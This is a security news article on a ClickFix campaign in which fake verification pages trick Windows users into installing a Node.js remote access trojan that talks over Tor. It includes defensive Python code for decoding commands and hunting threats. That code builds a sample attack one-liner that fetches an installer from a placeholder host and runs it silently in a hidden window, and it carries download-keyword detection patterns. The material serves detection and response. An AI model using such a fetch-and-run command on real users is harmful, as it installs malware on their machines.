Cybercriminals Exploit ClickFix Tactics to Deploy Node.js-Based RAT via Tor
A new cyberattack campaign is targeting Windows users through a deceptive technique known as ClickFix. Attackers present fake browser verification pages to trick individuals into executing hidden commands that install a Node.js-based Remote Access Trojan (RAT) on their systems. This malware then communicates with its operators via the Tor network, effectively concealing its traffic and making it challenging to trace or disrupt the attacker’s infrastructure.
Understanding ClickFix Attacks
ClickFix is a social engineering technique that appeared in 2024 and became widespread in 2025. A counterfeit CAPTCHA or identity verification page silently places a command on the clipboard and instructs the user to paste and run it, usually through the Windows Run dialog, so the victim performs the execution step that an exploit would otherwise have to. In this campaign the command launches PowerShell with a base64-encoded script that downloads an installer named `NodeServer-Setup-Full.msi` from a fraudulent domain and installs it silently, so no installer window appears to alert the user.
Technical Breakdown of the Attack
Researchers at Netskope Threat Labs have identified and tracked this campaign, noting its sophistication compared to earlier ClickFix operations. The attack unfolds as follows:
1. Deceptive Prompt: The user encounters a fake verification page that appears legitimate.
2. Clipboard Manipulation: The page writes a command to the clipboard, normally through JavaScript, while telling the user it is a harmless verification string.
3. Command Execution: The user is guided to paste and execute the command via the Windows Run dialog (Win+R).
4. Payload Delivery: Executing the command runs a PowerShell script that downloads and installs the malicious `NodeServer-Setup-Full.msi` file.
This method bypasses many controls because it contains no exploit: the user runs the command under their own account, the parent process is explorer.exe, and the tooling involved (PowerShell, msiexec) is signed and trusted. The Run dialog does leave a trace, however. Commands entered there are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and a PowerShell process spawned by explorer.exe with an encoded or hidden-window command line is a strong hunting signal.
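The encoded command from steps 3 and 4 is usually the first artefact a responder sees, either in the RunMRU key or in process telemetry. The following is an added example, not code from the Netskope report or from the campaign, that decodes such a command and extracts its indicators. The clipboard one-liner it works on is constructed for illustration: the domain `verify.example.invalid` is a placeholder, not a real indicator, and only the installer name `NodeServer-Setup-Full.msi` is taken from the article.

```python
"""Decode a ClickFix-style PowerShell one-liner and pull out its indicators.

Added example, not code from the Netskope report. The clipboard command
below is constructed: the domain (example.invalid) is a placeholder, not an
indicator from the campaign; only the .msi name comes from the article.
"""
import base64
import re
from typing import Optional

# Constructed stand-in for the script a ClickFix page hides behind -EncodedCommand.
SAMPLE_SCRIPT = (
    "$u='https://verify.example.invalid/NodeServer-Setup-Full.msi';"
    "$p=\"$env:TEMP\\NodeServer-Setup-Full.msi\";"
    "Invoke-WebRequest -Uri $u -OutFile $p;"
    "Start-Process msiexec.exe -ArgumentList '/i',$p,'/qn' -WindowStyle Hidden"
)


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the script encoded as UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# What the victim pastes into Win+R (constructed from SAMPLE_SCRIPT above).
SAMPLE_CLIPBOARD = (
    "powershell -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_powershell(SAMPLE_SCRIPT)
)

# Longest alias first so "-enc" is not consumed as "-e" followed by junk.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"<>;,)]+", re.IGNORECASE)
_FILE_RE = re.compile(r"[\w.-]+\.(?:msi|exe|hta|ps1|vbs|js|zip)\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line uses -EncodedCommand, else None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_iocs(cmdline: str) -> dict:
    """Decode if needed, then collect URLs, referenced files and evasion signals."""
    script = decode_encoded_command(cmdline)
    text = cmdline if script is None else cmdline + " " + script
    signals = []
    if script is not None:
        signals.append("encoded_command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", text, re.IGNORECASE):
        signals.append("hidden_window")
    if re.search(r"\bmsiexec(?:\.exe)?\b.*?/q[nb]?\b", text, re.IGNORECASE):
        signals.append("silent_msi_install")
    if re.search(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b",
                 text, re.IGNORECASE):
        signals.append("remote_download")
    return {
        "decoded": script,
        "urls": sorted(set(_URL_RE.findall(text))),
        # Includes LOLBins such as msiexec.exe as well as the dropped installer.
        "files": sorted(set(f.lower() for f in _FILE_RE.findall(text))),
        "signals": signals,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_CLIPBOARD), indent=2))
```

The UTF-16LE step is the part people get wrong when triaging by hand: decoding the blob as UTF-8 yields text interleaved with NUL bytes and the URL regex then misses the domain.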
Characteristics of the Node.js-Based RAT
The deployed RAT is built on a modular Node.js framework: a small loader fetches capability modules from the operators and loads them directly into memory. Because the most dangerous functionality never touches the disk, file-based scanning sees only the loader and the legitimate Node.js runtime it runs on; detection has to rely on process behaviour and memory inspection instead.
Malware-as-a-Service Infrastructure
A notable aspect of this campaign is the underlying Malware-as-a-Service (MaaS) platform. An operational security oversight by the attackers exposed the server-side admin panel, revealing features such as:
– Cryptocurrency Wallet Tracking: Monitoring and managing stolen cryptocurrency assets.
– Operator Management: Implementing role-based access controls for multiple operators.
– Custom Module Deployment: Pushing tailored modules to infected machines.
– Real-Time Alerts: Sending instant notifications via Telegram when new victims connect.
This infrastructure indicates a well-organized operation capable of scaling attacks efficiently.
System Profiling and Evasion Techniques
Once installed, the malware conducts thorough profiling of the compromised system, collecting data such as:
– Operating System Version: Identifying the specific OS in use.
– Hardware Details: Gathering information about the system’s hardware components.
– Geographic Location: Determining the physical location of the device.
– External IP Address: Recording the device’s public IP address.
– Security Tools Inventory: Listing active security software, including over 30 antivirus and endpoint security products like CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.
This information helps attackers assess the value of the target and tailor their approach accordingly.
Persistence and Communication Mechanisms
To maintain persistence, the malware:
– File Extraction: Extracts its files into the `%LOCALAPPDATA%\LogicOptimizer\` directory, a user-writable location that requires no elevation.
– Registry Modification: Adds an entry to a Windows Registry Run key so that it is launched automatically at user login.
– Stealth Execution: Launches Node.js through `conhost.exe --headless`, so no console window is created and the process stays hidden from the user.
Before contacting its command-and-control (C2) server, the malware decrypts its embedded configuration using AES-256-CBC combined with an XOR layer. The key material is reshuffled on every execution, which complicates static extraction of the configuration; in practice, analysts recover it by dumping process memory after decryption has run. The decrypted configuration contains a `.onion` Tor hidden service address as the C2 destination.
To connect to the C2 server, the malware:
1. Tor Integration: Downloads the Tor Expert Bundle from the official Tor Project website. Because this is the legitimate, signed Tor client, hash-based blocking does not help; the useful signal is a non-browser process fetching from torproject.org.
2. Proxy Setup: Runs the bundled Tor client, which exposes a local SOCKS5 proxy on the infected machine.
3. Secure Communication: Tunnels gRPC, an RPC framework over HTTP/2 that supports bidirectional streaming, through that proxy to the hidden service for real-time command and data exchange.
Routing C2 over a hidden service means there is no server IP address to block or attribute; defenders must instead key on the Tor client activity on the endpoint and at the network edge.
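Taking the persistence and Tor details above together, the following is an added example of hunt rules a detection engineer might write; it is not code from the Netskope report. The telemetry it runs on is constructed in a simplified Sysmon-like JSON form. The `LogicOptimizer` directory, the Run-key persistence, `conhost.exe --headless` launching Node.js and the Tor Expert Bundle download come from the article; the user name, the `start.cmd` launcher, the placement of `node.exe` inside `LogicOptimizer`, and the host `dist.torproject.org` are assumptions for illustration, not indicators.

```python
"""Hunt rules for the post-ClickFix host behaviour described above.

Added example, not code from the Netskope report. Events are constructed in
a simplified Sysmon-like JSON shape; only the LogicOptimizer directory, the
Run-key persistence, conhost --headless launching Node.js and the Tor Expert
Bundle download come from the article. Paths, user name and exact hosts are
assumptions for illustration.
"""
import json
import re
from typing import Callable, Dict, List

# Constructed sample telemetry, one JSON object per line (not real logs).
SAMPLE_EVENTS = r"""
{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\explorer.exe","cmdline":"powershell -NoProfile -WindowStyle Hidden -EncodedCommand JABlAG4AdgA6AFQARQBNAFAA"}
{"type":"process","image":"C:\\Windows\\System32\\msiexec.exe","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\NodeServer-Setup-Full.msi /qn"}
{"type":"registry","key":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","value":"LogicOptimizer","data":"C:\\Users\\u\\AppData\\Local\\LogicOptimizer\\start.cmd"}
{"type":"process","image":"C:\\Windows\\System32\\conhost.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"conhost.exe --headless node.exe app.js"}
{"type":"process","image":"C:\\Users\\u\\AppData\\Local\\LogicOptimizer\\node.exe","parent":"C:\\Windows\\System32\\conhost.exe","cmdline":"node.exe app.js"}
{"type":"network","image":"C:\\Users\\u\\AppData\\Local\\LogicOptimizer\\node.exe","dest_host":"dist.torproject.org","dest_port":443}
{"type":"process","image":"C:\\Windows\\explorer.exe","parent":"C:\\Windows\\System32\\userinit.exe","cmdline":"explorer.exe"}
{"type":"network","image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","dest_host":"www.torproject.org","dest_port":443}
"""

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "brave.exe", "iexplore.exe"}


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def run_dialog_powershell(ev: Dict) -> bool:
    """PowerShell spawned by explorer.exe (Win+R) with encoded or hidden-window args."""
    return (ev["type"] == "process"
            and _base(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and _base(ev["parent"]) == "explorer.exe"
            and re.search(r"-(?:encodedcommand|enc|ec|e)\b|-w(?:indowstyle)?\s+hidden",
                          ev["cmdline"], re.IGNORECASE) is not None)


def silent_msi_from_powershell(ev: Dict) -> bool:
    """msiexec run quietly (/qn, /qb, /quiet) by a PowerShell parent."""
    return (ev["type"] == "process"
            and _base(ev["image"]) == "msiexec.exe"
            and _base(ev["parent"]) in ("powershell.exe", "pwsh.exe")
            and re.search(r"/q(?:n|b|uiet)?\b", ev["cmdline"], re.IGNORECASE) is not None)


def run_key_into_localappdata(ev: Dict) -> bool:
    """Run-key value whose target lives under the user-writable %LOCALAPPDATA%."""
    return (ev["type"] == "registry"
            and ev["key"].lower().endswith("\\currentversion\\run")
            and "\\appdata\\local\\" in ev["data"].lower())


def headless_conhost_node(ev: Dict) -> bool:
    """conhost.exe --headless used to run Node.js without a console window."""
    cmd = ev.get("cmdline", "").lower()
    return (ev["type"] == "process" and _base(ev["image"]) == "conhost.exe"
            and "--headless" in cmd and "node" in cmd)


def node_in_localappdata(ev: Dict) -> bool:
    """A Node.js runtime executing from a per-user, unmanaged location."""
    return (ev["type"] == "process" and _base(ev["image"]) == "node.exe"
            and "\\appdata\\local\\" in ev["image"].lower())


def tor_fetch_by_nonbrowser(ev: Dict) -> bool:
    """Anything other than a browser reaching torproject.org (Tor Expert Bundle fetch)."""
    return (ev["type"] == "network"
            and ev["dest_host"].lower().endswith("torproject.org")
            and _base(ev["image"]) not in BROWSERS)


RULES: Dict[str, Callable[[Dict], bool]] = {
    "run_dialog_powershell": run_dialog_powershell,
    "silent_msi_from_powershell": silent_msi_from_powershell,
    "run_key_into_localappdata": run_key_into_localappdata,
    "headless_conhost_node": headless_conhost_node,
    "node_in_localappdata": node_in_localappdata,
    "tor_fetch_by_nonbrowser": tor_fetch_by_nonbrowser,
}


def hunt(events_jsonl: str) -> List[Dict]:
    """Run every rule over every event; one hit per (event, rule) match."""
    hits = []
    lines = [l for l in events_jsonl.splitlines() if l.strip()]
    for n, line in enumerate(lines, 1):
        ev = json.loads(line)
        for name, rule in RULES.items():
            if rule(ev):
                hits.append({"line": n, "rule": name,
                             "subject": ev.get("image") or ev.get("key")})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The two benign lines at the end (a normal explorer.exe start and Firefox visiting torproject.org) are there on purpose: each rule is scoped by parent process or image so that legitimate shells, browsers and installers do not fire. In a real deployment the same predicates map directly onto Sysmon event IDs 1, 3 and 13, or onto the equivalent EDR fields.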
Implications and Recommendations
The sophistication of this campaign underscores the evolving nature of cyber threats. By combining social engineering with advanced evasion techniques, attackers can bypass traditional security measures and maintain prolonged access to compromised systems.
Recommendations for Users and Organizations:
– User Education: Train users to recognise and refuse any prompt that asks them to paste a command into the Run dialog, a terminal or PowerShell; no legitimate CAPTCHA works that way.
– Endpoint Protection: Deploy EDR capable of catching fileless activity, and hunt for PowerShell launched by explorer.exe with encoded or hidden-window arguments, `conhost.exe --headless` launching Node.js, and Run-key entries pointing into `%LOCALAPPDATA%`. Where the Run dialog is not needed, disable it with the "Remove Run menu from Start Menu" Group Policy.
– Network Monitoring: Alert on non-browser processes downloading from torproject.org and on Tor client traffic leaving the network; where Tor has no business use, block it at the egress.
– Regular Updates: Keep all software and security tools updated to reduce the attack surface an installed RAT can use to escalate or spread.
By adopting a multi-layered security approach and fostering a culture of vigilance, organizations can better defend against such sophisticated attacks.